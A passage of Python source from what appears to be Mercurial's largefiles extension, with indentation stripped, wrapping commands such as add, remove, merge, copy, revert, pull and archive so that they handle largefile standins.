ui, lfutil.islfilesrepo(repo), opts.pop('lfsize', None))
lfmatcher = None
if lfutil.islfilesrepo(repo):
lfpats = ui.configlist(lfutil.longname, 'patterns', default=[])
if lfpats:
lfmatcher = match_.match(repo.root, '', list(lfpats))
lfnames = []
m = scmutil.match(repo[None], pats, opts)
m.bad = lambda x, y: None
wctx = repo[None]
for f in repo.walk(m):
exact = m.exact(f)
lfile = lfutil.standin(f) in wctx
nfile = f in wctx
exists = lfile or nfile
# Don't warn the user when they attempt to add a normal tracked file.
# The normal add code will do that for us.
if exact and exists:
if lfile:
ui.warn(_('%s already a largefile\n') % f)
continue
if (exact or not exists) and not lfutil.isstandin(f):
wfile = repo.wjoin(f)
# In case the file was removed previously, but not committed
# (issue3507)
if not os.path.exists(wfile):
continue
abovemin = (lfsize and
os.lstat(wfile).st_size >= lfsize * 1024 * 1024)
if large or abovemin or (lfmatcher and lfmatcher(f)):
lfnames.append(f)
if ui.verbose or not exact:
ui.status(_('adding %s as a largefile\n') % m.rel(f))
bad = []
standins = []
# Need to lock, otherwise there could be a race condition between
# when standins are created and added to the repo.
wlock = repo.wlock()
try:
if not opts.get('dry_run'):
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in lfnames:
standinname = lfutil.standin(f)
lfutil.writestandin(repo, standinname, hash='',
executable=lfutil.getexecutable(repo.wjoin(f)))
standins.append(standinname)
if lfdirstate[f] == 'r':
lfdirstate.normallookup(f)
else:
lfdirstate.add(f)
lfdirstate.write()
bad += [lfutil.splitstandin(f)
for f in repo[None].add(standins)
if f in m.files()]
finally:
wlock.release()
return bad
def removelargefiles(ui, repo, *pats, **opts):
after = opts.get('after')
if not pats and not after:
raise util.Abort(_('no files specified'))
m = scmutil.match(repo[None], pats, opts)
try:
repo.lfstatus = True
s = repo.status(match=m, clean=True)
finally:
repo.lfstatus = False
manifest = repo[None].manifest()
modified, added, deleted, clean = [[f for f in list
if lfutil.standin(f) in manifest]
for list in [s[0], s[1], s[3], s[6]]]
def warn(files, msg):
for f in files:
ui.warn(msg % m.rel(f))
return int(len(files) > 0)
result = 0
if after:
remove, forget = deleted, []
result = warn(modified + added + clean,
_('not removing %s: file still exists\n'))
else:
remove, forget = deleted + clean, []
result = warn(modified, _('not removing %s: file is modified (use -f'
' to force removal)\n'))
result = warn(added, _('not removing %s: file has been marked for add'
' (use forget to undo)\n')) or result
for f in sorted(remove + forget):
if ui.verbose or not m.exact(f):
ui.status(_('removing %s\n') % m.rel(f))
# Need to lock because standin files are deleted then removed from the
# repository and we could race in-between.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in remove:
if not after:
# If this is being called by addremove, notify the user that we
# are removing the file.
if getattr(repo, "_isaddremove", False):
ui.status(_('removing %s\n') % f)
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
lfdirstate.remove(f)
lfdirstate.write()
forget = [lfutil.standin(f) for f in forget]
remove = [lfutil.standin(f) for f in remove]
repo[None].forget(forget)
# If this is being called by addremove, let the original addremove
# function handle this.
if not getattr(repo, "_isaddremove", False):
for f in remove:
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
repo[None].forget(remove)
finally:
wlock.release()
return result
# For overriding mercurial.hgweb.webcommands so that largefiles will
# appear at their right place in the manifests.
def decodepath(orig, path):
return lfutil.splitstandin(path) or path
# -- Wrappers: modify existing commands --------------------------------
# Add works by going through the files that the user wanted to add and
# checking if they should be added as largefiles. Then it makes a new
# matcher which matches only the normal files and runs the original
# version of add.
def overrideadd(orig, ui, repo, *pats, **opts):
normal = opts.pop('normal')
if normal:
if opts.get('large'):
raise util.Abort(_('--normal cannot be used with --large'))
return orig(ui, repo, *pats, **opts)
bad = addlargefiles(ui, repo, *pats, **opts)
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
return (result == 1 or bad) and 1 or 0
def overrideremove(orig, ui, repo, *pats, **opts):
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
return removelargefiles(ui, repo, *pats, **opts) or result
def overridestatusfn(orig, repo, rev2, **opts):
try:
repo._repo.lfstatus = True
return orig(repo, rev2, **opts)
finally:
repo._repo.lfstatus = False
def overridestatus(orig, ui, repo, *pats, **opts):
try:
repo.lfstatus = True
return orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
def overridedirty(orig, repo, ignoreupdate=False):
try:
repo._repo.lfstatus = True
return orig(repo, ignoreupdate)
finally:
repo._repo.lfstatus = False
def overridelog(orig, ui, repo, *pats, **opts):
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
"""Matcher that merges root directory with .hglf, suitable for log.
It is still possible to match .hglf directly.
For any listed files run log on the standin too.
matchfn tries both the given filename and with .hglf stripped.
"""
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
standins = [lfutil.standin(f) for f in m._files]
m._files.extend(standins)
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
def lfmatchfn(f):
lf = lfutil.splitstandin(f)
if lf is not None and origmatchfn(lf):
return True
r = origmatchfn(f)
return r
m.matchfn = lfmatchfn
return m
oldmatch = installmatchfn(overridematch)
try:
repo.lfstatus = True
return orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
restorematchfn()
def overrideverify(orig, ui, repo, *pats, **opts):
large = opts.pop('large', False)
all = opts.pop('lfa', False)
contents = opts.pop('lfc', False)
result = orig(ui, repo, *pats, **opts)
if large or all or contents:
result = result or lfcommands.verifylfiles(ui, repo, all, contents)
return result
def overridedebugstate(orig, ui, repo, *pats, **opts):
large = opts.pop('large', False)
if large:
lfcommands.debugdirstate(ui, repo)
else:
orig(ui, repo, *pats, **opts)
# Override needs to refresh standins so that update's normal merge
# will go through properly. Then the other update hook (overriding repo.update)
# will get the new files. Filemerge is also overridden so that the merge
# will merge standins correctly.
def overrideupdate(orig, ui, repo, *pats, **opts):
lfdirstate = lfutil.openlfdirstate(ui, repo)
s = lfdirstate.status(match_.always(repo.root, repo.getcwd()), [], False,
False, False)
(unsure, modified, added, removed, missing, unknown, ignored, clean) = s
# Need to lock between the standins getting updated and their
# largefiles getting updated
wlock = repo.wlock()
try:
if opts['check']:
mod = len(modified) > 0
for lfile in unsure:
standin = lfutil.standin(lfile)
if repo['.'][standin].data().strip() != \
lfutil.hashfile(repo.wjoin(lfile)):
mod = True
else:
lfdirstate.normal(lfile)
lfdirstate.write()
if mod:
raise util.Abort(_('uncommitted local changes'))
# XXX handle removed differently
if not opts['clean']:
for lfile in unsure + modified + added:
lfutil.updatestandin(repo, lfutil.standin(lfile))
finally:
wlock.release()
return orig(ui, repo, *pats, **opts)
# Before starting the manifest merge, merge.updates will call
# _checkunknown to check if there are any files in the merged-in
# changeset that collide with unknown files in the working copy.
#
# The largefiles are seen as unknown, so this prevents us from merging
# in a file 'foo' if we already have a largefile with the same name.
#
# The overridden function filters the unknown files by removing any
# largefiles. This makes the merge proceed and we can then handle this
# case further in the overridden manifestmerge function below.
def overridecheckunknownfile(origfn, repo, wctx, mctx, f):
if lfutil.standin(repo.dirstate.normalize(f)) in wctx:
return False
return origfn(repo, wctx, mctx, f)
# The manifest merge handles conflicts on the manifest level. We want
# to handle changes in largefile-ness of files at this level too.
#
# The strategy is to run the original manifestmerge and then process
# the action list it outputs. There are two cases we need to deal with:
#
# 1. Normal file in p1, largefile in p2. Here the largefile is
# detected via its standin file, which will enter the working copy
# with a "get" action. It is not "merge" since the standin is all
# Mercurial is concerned with at this level -- the link to the
# existing normal file is not relevant here.
#
# 2. Largefile in p1, normal file in p2. Here we get a "merge" action
# since the largefile will be present in the working copy and
# different from the normal file in p2. Mercurial therefore
# triggers a merge action.
#
# In both cases, we prompt the user and emit new actions to either
# remove the standin (if the normal file was kept) or to remove the
# normal file and get the standin (if the largefile was kept). The
# default prompt answer is to use the largefile version since it was
# presumably changed on purpose.
#
# Finally, the merge.applyupdates function will then take care of
# writing the files into the working copy and lfcommands.updatelfiles
# will update the largefiles.
def overridemanifestmerge(origfn, repo, p1, p2, pa, branchmerge, force,
partial, acceptremote=False):
overwrite = force and not branchmerge
actions = origfn(repo, p1, p2, pa, branchmerge, force, partial,
acceptremote)
processed = []
for action in actions:
if overwrite:
processed.append(action)
continue
f, m, args, msg = action
choices = (_('&Largefile'), _('&Normal file'))
splitstandin = lfutil.splitstandin(f)
if (m == "g" and splitstandin is not None and
splitstandin in p1 and f in p2):
# Case 1: normal file in the working copy, largefile in
# the second parent
lfile = splitstandin
standin = f
msg = _('%s has been turned into a largefile\n'
'use (l)argefile or keep as (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
processed.append((standin, "g", (p2.flags(standin),), msg))
else:
processed.append((standin, "r", None, msg))
elif m == "g" and lfutil.standin(f) in p1 and f in p2:
# Case 2: largefile in the working copy, normal file in
# the second parent
standin = lfutil.standin(f)
lfile = f
msg = _('%s has been turned into a normal file\n'
'keep as (l)argefile or use (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
else:
processed.append((standin, "r", None, msg))
processed.append((lfile, "g", (p2.flags(lfile),), msg))
else:
processed.append(action)
return processed
# Override filemerge to prompt the user about how they wish to merge
# largefiles. This will handle identical edits, and copy/rename +
# edit without prompting the user.
def overridefilemerge(origfn, repo, mynode, orig, fcd, fco, fca):
# Use better variable names here. Because this is a wrapper we cannot
# change the variable names in the function declaration.
fcdest, fcother, fcancestor = fcd, fco, fca
if not lfutil.isstandin(orig):
return origfn(repo, mynode, orig, fcdest, fcother, fcancestor)
else:
if not fcother.cmp(fcdest): # files identical?
return None
# backwards, use working dir parent as ancestor
if fcancestor == fcother:
fcancestor = fcdest.parents()[0]
if orig != fcother.path():
repo.ui.status(_('merging %s and %s to %s\n')
% (lfutil.splitstandin(orig),
lfutil.splitstandin(fcother.path()),
lfutil.splitstandin(fcdest.path())))
else:
repo.ui.status(_('merging %s\n')
% lfutil.splitstandin(fcdest.path()))
if fcancestor.path() != fcother.path() and fcother.data() == \
fcancestor.data():
return 0
if fcancestor.path() != fcdest.path() and fcdest.data() == \
fcancestor.data():
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
if repo.ui.promptchoice(_('largefile %s has a merge conflict\n'
'keep (l)ocal or take (o)ther?') %
lfutil.splitstandin(orig),
(_('&Local'), _('&Other')), 0) == 0:
return 0
else:
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
# Copy first changes the matchers to match standins instead of
# largefiles. Then it overrides util.copyfile in that function it
# checks if the destination largefile already exists. It also keeps a
# list of copied files so that the largefiles can be copied and the
# dirstate updated.
def overridecopy(orig, ui, repo, pats, opts, rename=False):
# doesn't remove largefile on rename
if len(pats) < 2:
# this isn't legal, let the original function deal with it
return orig(ui, repo, pats, opts, rename)
def makestandin(relpath):
path = scmutil.canonpath(repo.root, repo.getcwd(), relpath)
return os.path.join(repo.wjoin(lfutil.standin(path)))
fullpats = scmutil.expandpats(pats)
dest = fullpats[-1]
if os.path.isdir(dest):
if not os.path.isdir(makestandin(dest)):
os.makedirs(makestandin(dest))
# This could copy both lfiles and normal files in one command,
# but we don't want to do that. First replace their matcher to
# only match normal files and run it, then replace it to just
# match largefiles and run it again.
nonormalfiles = False
nolfiles = False
try:
try:
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, pats, opts, rename)
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nonormalfiles = True
result = 0
finally:
restorematchfn()
# The first rename can cause our current working directory to be removed.
# In that case there is nothing left to copy/rename so just quit.
try:
repo.getcwd()
except OSError:
return result
try:
try:
# When we call orig below it creates the standins but we don't add
# them to the dir state until later so lock during that time.
wlock = repo.wlock()
manifest = repo[None].manifest()
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
newpats = []
# The patterns were previously mangled to add the standin
# directory; we need to remove that now
for pat in pats:
if match_.patkind(pat) is None and lfutil.shortname in pat:
newpats.append(pat.replace(lfutil.shortname, ''))
else:
newpats.append(pat)
match = oldmatch(ctx, newpats, opts, globbed, default)
m = copy.copy(match)
lfile = lambda f: lfutil.standin(f) in manifest
m._files = [lfutil.standin(f) for f in m._files if lfile(f)]
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
m.matchfn = lambda f: (lfutil.isstandin(f) and
(f in manifest) and
origmatchfn(lfutil.splitstandin(f)) or
None)
return m
oldmatch = installmatchfn(overridematch)
listpats = []
for pat in pats:
if match_.patkind(pat) is not None:
listpats.append(pat)
else:
listpats.append(makestandin(pat))
try:
origcopyfile = util.copyfile
copiedfiles = []
def overridecopyfile(src, dest):
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
destlfile = dest.replace(lfutil.shortname, '')
if not opts['force'] and os.path.exists(destlfile):
raise IOError('',
_('destination largefile already exists'))
copiedfiles.append((src, dest))
origcopyfile(src, dest)
util.copyfile = overridecopyfile
result += orig(ui, repo, listpats, opts, rename)
finally:
util.copyfile = origcopyfile
lfdirstate = lfutil.openlfdirstate(ui, repo)
for (src, dest) in copiedfiles:
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
srclfile = src.replace(repo.wjoin(lfutil.standin('')), '')
destlfile = dest.replace(repo.wjoin(lfutil.standin('')), '')
destlfiledir = os.path.dirname(repo.wjoin(destlfile)) or '.'
if not os.path.isdir(destlfiledir):
os.makedirs(destlfiledir)
if rename:
os.rename(repo.wjoin(srclfile), repo.wjoin(destlfile))
lfdirstate.remove(srclfile)
else:
util.copyfile(repo.wjoin(srclfile),
repo.wjoin(destlfile))
lfdirstate.add(destlfile)
lfdirstate.write()
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nolfiles = True
finally:
restorematchfn()
wlock.release()
if nolfiles and nonormalfiles:
raise util.Abort(_('no files to copy'))
return result
# When the user calls revert, we have to be careful to not revert any
# changes to other largefiles accidentally. This means we have to keep
# track of the largefiles that are being reverted so we only pull down
# the necessary largefiles.
#
# Standins are only updated (to match the hash of largefiles) before
# commits. Update the standins then run the original revert, changing
# the matcher to hit standins instead of largefiles. Based on the
# resulting standins update the largefiles. Then return the standins
# to their proper state
def overriderevert(orig, ui, repo, *pats, **opts):
# Because we put the standins in a bad state (by updating them)
# and then return them to a correct state we need to lock to
# prevent others from changing them in their incorrect state.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
(modified, added, removed, missing, unknown, ignored, clean) = \
lfutil.lfdirstatestatus(lfdirstate, repo, repo['.'].rev())
lfdirstate.write()
for lfile in modified:
lfutil.updatestandin(repo, lfutil.standin(lfile))
for lfile in missing:
if (os.path.exists(repo.wjoin(lfutil.standin(lfile)))):
os.unlink(repo.wjoin(lfutil.standin(lfile)))
try:
ctx = scmutil.revsingle(repo, opts.get('rev'))
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
def tostandin(f):
if lfutil.standin(f) in ctx:
return lfutil.standin(f)
elif lfutil.standin(f) in repo[None]:
return None
return f
m._files = [tostandin(f) for f in m._files]
m._files = [f for f in m._files if f is not None]
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
def matchfn(f):
if lfutil.isstandin(f):
# We need to keep track of what largefiles are being
# matched so we know which ones to update later --
# otherwise we accidentally revert changes to other
# largefiles. This is repo-specific, so duckpunch the
# repo object to keep the list of largefiles for us
# later.
if origmatchfn(lfutil.splitstandin(f)) and \
(f in repo[None] or f in ctx):
lfileslist = getattr(repo, '_lfilestoupdate', [])
lfileslist.append(lfutil.splitstandin(f))
repo._lfilestoupdate = lfileslist
return True
else:
return False
return origmatchfn(f)
m.matchfn = matchfn
return m
oldmatch = installmatchfn(overridematch)
scmutil.match
matches = overridematch(repo[None], pats, opts)
orig(ui, repo, *pats, **opts)
finally:
restorematchfn()
lfileslist = getattr(repo, '_lfilestoupdate', [])
lfcommands.updatelfiles(ui, repo, filelist=lfileslist,
printmessage=False)
# empty out the largefiles list so we start fresh next time
repo._lfilestoupdate = []
for lfile in modified:
if lfile in lfileslist:
if os.path.exists(repo.wjoin(lfutil.standin(lfile))) and lfile\
in repo['.']:
lfutil.writestandin(repo, lfutil.standin(lfile),
repo['.'][lfile].data().strip(),
'x' in repo['.'][lfile].flags())
lfdirstate = lfutil.openlfdirstate(ui, repo)
for lfile in added:
standin = lfutil.standin(lfile)
if standin not in ctx and (standin in matches or opts.get('all')):
if lfile in lfdirstate:
lfdirstate.drop(lfile)
util.unlinkpath(repo.wjoin(standin))
lfdirstate.write()
finally:
wlock.release()
def hgupdaterepo(orig, repo, node, overwrite):
if not overwrite:
# Only call updatelfiles on the standins that have changed to save time
oldstandins = lfutil.getstandinsstate(repo)
result = orig(repo, node, overwrite)
filelist = None
if not overwrite:
newstandins = lfutil.getstandinsstate(repo)
filelist = lfutil.getlfilestoupdate(oldstandins, newstandins)
lfcommands.updatelfiles(repo.ui, repo, filelist=filelist)
return result
def hgmerge(orig, repo, node, force=None, remind=True):
result = orig(repo, node, force, remind)
lfcommands.updatelfiles(repo.ui, repo)
return result
# When we rebase a repository with remotely changed largefiles, we need to
# take some extra care so that the largefiles are correctly updated in the
# working copy
def overridepull(orig, ui, repo, source=None, **opts):
revsprepull = len(repo)
if not source:
source = 'default'
repo.lfpullsource = source
if opts.get('rebase', False):
repo._isrebasing = True
try:
if opts.get('update'):
del opts['update']
ui.debug('--update and --rebase are not compatible, ignoring '
'the update flag\n')
del opts['rebase']
cmdutil.bailifchanged(repo)
origpostincoming = commands.postincoming
def _dummy(*args, **kwargs):
pass
commands.postincoming = _dummy
try:
result = commands.pull(ui, repo, source, **opts)
finally:
commands.postincoming = origpostincoming
revspostpull = len(repo)
if revspostpull > revsprepull:
result = result or rebase.rebase(ui, repo)
finally:
repo._isrebasing = False
else:
result = orig(ui, repo, source, **opts)
revspostpull = len(repo)
lfrevs = opts.get('lfrev', [])
if opts.get('all_largefiles'):
lfrevs.append('pulled()')
if lfrevs and revspostpull > revsprepull:
numcached = 0
repo.firstpulled = revsprepull # for pulled() revset expression
try:
for rev in scmutil.revrange(repo, lfrevs):
ui.note(_('pulling largefiles for revision %s\n') % rev)
(cached, missing) = lfcommands.cachelfiles(ui, repo, rev)
numcached += len(cached)
finally:
del repo.firstpulled
ui.status(_("%d largefiles cached\n") % numcached)
return result
def pulledrevsetsymbol(repo, subset, x):
"""``pulled()``
    Changesets that have just been pulled.
Only available with largefiles from pull --lfrev expressions.
.. container:: verbose
Some examples:
- pull largefiles for all new changesets::
hg pull -lfrev "pulled()"
- pull largefiles for all new branch heads::
hg pull -lfrev "head(pulled()) and not closed()"
"""
try:
firstpulled = repo.firstpulled
except AttributeError:
raise util.Abort(_("pulled() only available in --lfrev"))
return [r for r in subset if r >= firstpulled]
def overrideclone(orig, ui, source, dest=None, **opts):
d = dest
if d is None:
d = hg.defaultdest(source)
if opts.get('all_largefiles') and not hg.islocal(d):
raise util.Abort(_(
'--all-largefiles is incompatible with non-local destination %s' %
d))
return orig(ui, source, dest, **opts)
def hgclone(orig, ui, opts, *args, **kwargs):
result = orig(ui, opts, *args, **kwargs)
if result is not None:
sourcerepo, destrepo = result
repo = destrepo.local()
# Caching is implicitly limited to 'rev' option, since the dest repo was
# truncated at that point. The user may expect a download count with
# this option, so attempt whether or not this is a largefile repo.
if opts.get('all_largefiles'):
success, missing = lfcommands.downloadlfiles(ui, repo, None)
if missing != 0:
return None
return result
def overriderebase(orig, ui, repo, **opts):
repo._isrebasing = True
try:
return orig(ui, repo, **opts)
finally:
repo._isrebasing = False
def overridearchive(orig, repo, dest, node, kind, decode=True, matchfn=None,
prefix=None, mtime=None, subrepos=None):
# No need to lock because we are only reading history and
# largefile caches, neither of which are modified.
lfcommands.cachelfiles(repo.ui, repo, node)
if kind not in archival.archivers:
raise util.Abort(_("unknown archive type '%s'") % kind)
ctx = repo[node]
if kind == 'files':
if prefix:
raise util.Abort(
_('cannot give prefix when archiving to files'))
else:
prefix = archival.tidyprefix(dest, kind, prefix)
def write(name, mode, islink, getdata):
if matchfn and not matchfn(name):
return
data = getdata()
if decode:
data = repo.wwritedata(name, data)
archiver.addfile(prefix + name, mode, islink, data)
archiver = archival.archivers[kind](dest, mtime or ctx.date()[0])
if repo.ui.configbool("ui", "archivemeta", True):
def metadata():
base = 'repo: %s\nnode: %s\nbranch: %s\n' % (
hex(repo.changelog.node(0)), hex(node), ctx.branch())
tags = ''.join('tag: %s\n' % t for t in ctx.tags()
if repo.tagtype(t) == 'global')
if not tags:
repo.ui.pushbuffer()
opts = {'template': '{latesttag}\n{latesttagdistance}',
'style': '', 'patch': None, 'git': None}
cmdutil.show_changeset(repo.ui, repo, opts).show(ctx)
ltags, dist = repo.ui.popbuffer().split('\n')
tags = ''.join('latesttag: %s\n' % t for t in ltags.split(':'))
tags += 'latesttagdistance: %s\n' % dist
return base + tags
write('.hg_archival.txt', 0644, False, metadata)
for f in ctx:
ff = ctx.flags(f)
getdata = ctx[f].data
if lfutil.isstandin(f):
path = lfutil.findfile(repo, getdata().strip())
if path is None:
raise util.Abort(
_('largefile %s not found in repo store or system cache')
% lfutil.splitstandin(f))
f = lfutil.splitstandin(f)
def getdatafn():
fd = None
try:
fd = open(path, 'rb')
return fd.read()
finally:
if fd:
fd.close()
getdata = getdatafn
write(f, 'x' in ff and 0755 or 0644, 'l' in ff, getdata)
if subrepos:
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
submatch = match_.narrowmatcher(subpath, matchfn)
sub.archive(repo.ui, archiver, prefix, submatch)
archiver.done()
def hgsubrepoarchive(orig, repo, ui, archiver, prefix, match=None):
repo._get(repo._state + ('hg',))
rev = repo._state[1]
ctx = repo._repo[rev]
lfcommands.cachelfiles(ui, repo._repo, ctx.node())
def write(name, mode, islink, getdata):
# At this point, the standin has been replaced with the largefile name,
# so the normal matcher works here without the lfutil variants.
if match and not match(f):
return
data = getdata()
archiver.addfile(prefix + repo._path + '/' + name, mode, islink, data)
for f in ctx:
ff = ctx.flags(f)
getdata = ctx[f].data
if lfutil.isstandin(f):
path = lfutil.findfile(repo._repo, getdata().strip())
if path is None:
raise util.Abort(
_('largefile %s not found in repo store or system cache')
% lfutil.splitstandin(f))
f = lfutil.splitstandin(f)
def getdatafn():
fd = None
try:
fd = open(os.path.join(prefix, path), 'rb')
return fd.read()
finally:
if fd:
fd.close()
getdata = getdatafn
write(f, 'x' in ff and 0755 or 0644, 'l' in ff, getdata)
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
submatch = match_.narrowmatcher(subpath, match)
sub.archive(ui, archiver, os.path.join(prefix, repo._path) + '/',
submatch)
# If a largefile is modified, the change is not reflected in its
# standin until a commit. cmdutil.bailifchanged() raises an exception
# if the repo has uncommitted changes. Wrap it to also check if
# largefiles were changed. This is used by bisect and backout.
def overridebailifchanged(orig, repo):
orig(repo)
repo.lfstatus = True
modified, added, removed, deleted = repo.status()[:4]
repo.lfstatus = False
if modified or added or removed or deleted:
raise util.Abort(_('outstanding uncommitted changes'))
# Fetch doesn't use cmdutil.bailifchanged so override it to add the check
def overridefetch(orig, ui, repo, *pats, **opts):
repo.lfstatus = True
modified, added, removed, deleted = repo.status()[:4]
repo.lfstatus = False
if modified or added or removed or deleted:
raise util.Abort(_('outstanding uncommitted changes'))
return orig(ui, repo, *pats, **opts)
def overrideforget(orig, ui, repo, *pats, **opts):
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
m = scmutil.match(repo[None], pats, opts)
try:
repo.lfstatus = True
s = repo.status(match=m, clean=True)
finally:
repo.lfstatus = False
forget = sorted(s[0] + s[1] + s[3] + s[6])
forget = [f for f in forget if lfutil.standin(f) in repo[None].manifest()]
for f in forget:
if lfutil.standin(f) not in repo.dirstate and not \
os.path.isdir(m.rel(lfutil.standin(f))):
ui.warn(_('not removing %s: file is already untracked\n')
% m.rel(f))
result = 1
for f in forget:
if ui.verbose or not m.exact(f):
ui.status(_('removing %s\n') % m.rel(f))
# Need to lock because standin files are deleted then removed from the
# repository and we could race in-between.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in forget:
if lfdirstate[f] == 'a':
lfdirstate.drop(f)
else:
lfdirstate.remove(f)
lfdirstate.write()
standins = [lfutil.standin(f) for f in forget]
for f in standins:
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
repo[None].forget(standins)
finally:
wlock.release()
return result
def getoutgoinglfiles(ui, repo, dest=None, **opts):
dest = ui.expandpath(dest or 'default-push', dest or 'default')
dest, branches = hg.parseurl(dest, opts.get('branch'))
revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get('rev'))
if revs:
revs = [repo.lookup(rev) for rev in scmutil.revrange(repo, revs)]
try:
remote = hg.peer(repo, opts, dest)
except error.RepoError:
return None
outgoing = discovery.findcommonoutgoing(repo, remote.peer(), force=False)
if not outgoing.missing:
return outgoing.missing
o = repo.changelog.nodesbetween(outgoing.missing, revs)[0]
if opts.get('newest_first'):
o.reverse()
toupload = set()
for n in o:
parents = [p for p in repo.changelog.parents(n) if p != node.nullid]
ctx = repo[n]
files = set(ctx.files())
if len(parents) == 2:
mc = ctx.manifest()
mp1 = ctx.parents()[0].manifest()
mp2 = ctx.parents()[1].manifest()
for f in mp1:
if f not in mc:
files.add(f)
for f in mp2:
if f not in mc:
files.add(f)
for f in mc:
if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
files.add(f)
toupload = toupload.union(
set([f for f in files if lfutil.isstandin(f) and f in ctx]))
return sorted(toupload)
def overrideoutgoing(orig, ui, repo, dest=None, **opts):
result = orig(ui, repo, dest, **opts)
if opts.pop('large', None):
toupload = getoutgoinglfiles(ui, repo, dest, **opts)
if toupload is None:
ui.status(_('largefiles: No remote repo\n'))
elif not toupload:
ui.status(_('largefiles: no files to upload\n'))
else:
ui.status(_('largefiles to upload:\n'))
for file in toupload:
ui.status(lfutil.splitstandin(file) + '\n')
ui.status('\n')
return result
def overridesummary(orig, ui, repo, *pats, **opts):
try:
repo.lfstatus = True
orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
if opts.pop('large', None):
toupload = getoutgoinglfiles(ui, repo, None, **opts)
if toupload is None:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: (no remote repo)\n'))
elif not toupload:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: (no files to upload)\n'))
else:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: %d to upload\n') % len(toupload))
def scmutiladdremove(orig, repo, pats=[], opts={}, dry_run=None,
similarity=None):
if not lfutil.islfilesrepo(repo):
return orig(repo, pats, opts, dry_run, similarity)
# Get the list of missing largefiles so we can remove them
lfdirstate = lfutil.openlfdirstate(repo.ui, repo)
s = lfdirstate.status(match_.always(repo.root, repo.getcwd()), [], False,
False, False)
(unsure, modified, added, removed, missing, unknown, ignored, clean) = s
    # Call into the normal remove code, but leave removal of the standin to
    # the original addremove. Monkey patching here makes sure we don't remove
    # the standin in the largefiles code, preventing a very confused state
    # later.
if missing:
m = [repo.wjoin(f) for f in missing]
repo._isaddremove = True
removelargefiles(repo.ui, repo, *m, **opts)
repo._isaddremove = False
# Call into the normal add code, and any files that *should* be added as
# largefiles will be
addlargefiles(repo.ui, repo, *pats, **opts)
# Now that we've handled largefiles, hand off to the original addremove
# function to take care of the rest. Make sure it doesn't do anything with
# largefiles by installing a matcher that will ignore them.
installnormalfilesmatchfn(repo[None].manifest())
result = orig(repo, pats, opts, dry_run, similarity)
restorematchfn()
return result
# Calling purge with --all will cause the largefiles to be deleted.
# Override repo.status to prevent this from happening.
def overridepurge(orig, ui, repo, *dirs, **opts):
    # XXX large file status is buggy when used on repo proxy.
    # XXX this needs to be investigated.
repo = repo.unfiltered()
oldstatus = repo.status
def overridestatus(node1='.', node2=None, match=None, ignored=False,
clean=False, unknown=False, listsubrepos=False):
r = oldstatus(node1, node2, match, ignored, clean, unknown,
listsubrepos)
lfdirstate = lfutil.openlfdirstate(ui, repo)
modified, added, removed, deleted, unknown, ignored, clean = r
unknown = [f for f in unknown if lfdirstate[f] == '?']
ignored = [f for f in ignored if lfdirstate[f] == '?']
return modified, added, removed, deleted, unknown, ignored, clean
repo.status = overridestatus
orig(ui, repo, *dirs, **opts)
repo.status = oldstatus
def overriderollback(orig, ui, repo, **opts):
result = orig(ui, repo, **opts)
merge.update(repo, node=None, branchmerge=False, force=True,
partial=lfutil.isstandin)
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
lfiles = lfutil.listlfiles(repo)
oldlfiles = lfutil.listlfiles(repo, repo[None].parents()[0].rev())
for file in lfiles:
if file in oldlfiles:
lfdirstate.normallookup(file)
else:
lfdirstate.add(file)
lfdirstate.write()
finally:
wlock.release()
return result
def overridetransplant(orig, ui, repo, *revs, **opts):
try:
oldstandins = lfutil.getstandinsstate(repo)
repo._istransplanting = True
result = orig(ui, repo, *revs, **opts)
newstandins = lfutil.getstandinsstate(repo)
filelist = lfutil.getlfilestoupdate(oldstandins, newstandins)
lfcommands.updatelfiles(repo.ui, repo, filelist=filelist,
printmessage=True)
finally:
repo._istransplanting = False
return result
def overridecat(orig, ui, repo, file1, *pats, **opts):
ctx = scmutil.revsingle(repo, opts.get('rev'))
err = 1
notbad = set()
m = scmutil.match(ctx, (file1,) + pats, opts)
origmatchfn = m.matchfn
def lfmatchfn(f):
